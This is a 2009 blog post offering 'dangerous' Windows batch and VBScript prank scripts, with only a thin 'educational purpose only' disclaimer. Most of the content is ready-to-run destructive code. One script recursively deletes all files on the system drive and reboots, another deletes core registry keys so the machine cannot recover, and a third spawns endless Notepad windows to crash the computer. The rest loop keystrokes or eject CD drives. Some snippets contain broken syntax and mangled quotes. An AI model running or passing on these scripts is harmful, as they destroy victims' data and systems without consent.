Register to Get Access to all the Stuff!!!

Conducting any Symposium at your college & need to Promote it just mail us at : contact@sharingportal.net

To Subscribe to Mobile Alerts Click Here

Now Receive Updates to Mobile by Free Subscription Send SMS ‘ON SharingPortal’ to 9870807070

50 views

Hot: 8 Dangerous VB Scripts


Note:- The Following tutorial is for educational purpose only. SharingPortal.net is not responsible for the misuse of the programs by the visitors.

———————————————————————————————————
-The blue screen of Death [this might be dangerous]

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
———————————————————————————————————
-Stupidity Shutdown

*This pops up a funny message then will shutdown the computer*

@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10
———————————————————————————————————
-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]

*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE
———————————————————————————————————
-Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes*

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
———————————————————————————————————
-Crazy caps lock

*This constantly turns caps lock on and off really fast continuously*

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK**”
loop
———————————————————————————————————
-Endless Enter

*This constantly makes it so the enter button is being pressed continuesly*

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
———————————————————————————————————
-Endless Backspace

*This makes it so the backspace key is constantly being pressed*

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs**”
loop
———————————————————————————————————
-Popping CD Drives

*This will make the CD drives constantly pop out*

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

  • Share/Bookmark

Related posts:

  1. Hot: Wanna make your keyboard go Live Disco
  2. VBScript – NotePad Trick
  3. Hot: How to enable registry editor from Disable
  4. Fun with Windows :p
  5. Hot: VB Script to make your PC Talk

Posted by shivanarayan on Nov 30th, 2009 and filed under Programming, Tips 'n' Tricks. You can follow any responses to this entry through the RSS 2.0. You can leave a response by filling following comment form or trackback to this entry from your site

Leave a Reply

:bye: 
:good: 
:negative: 
:scratch: 
:wacko: 
:yahoo: 
:cool: 
:heart: 
:rose: 
:smile: 
:whistle: 
:yes: 
:cray: 
:mail: 
:sad: 
:wink: 
:unsure: 
 
DISCLAIMER
None of the files shown here are hosted or transmitted by this server. The links are provided solely by this site's users. The administrator of this site (sharingportal.net) cannot be held responsible for what its users post, or any other actions of its users. You may not use this site to distribute or download any material when you do not have the legal rights to do so. It is your own responsibility to adhere to these terms. All the information provided on this site are for educational purposes only. The site is no way responsible for any misuse of the information.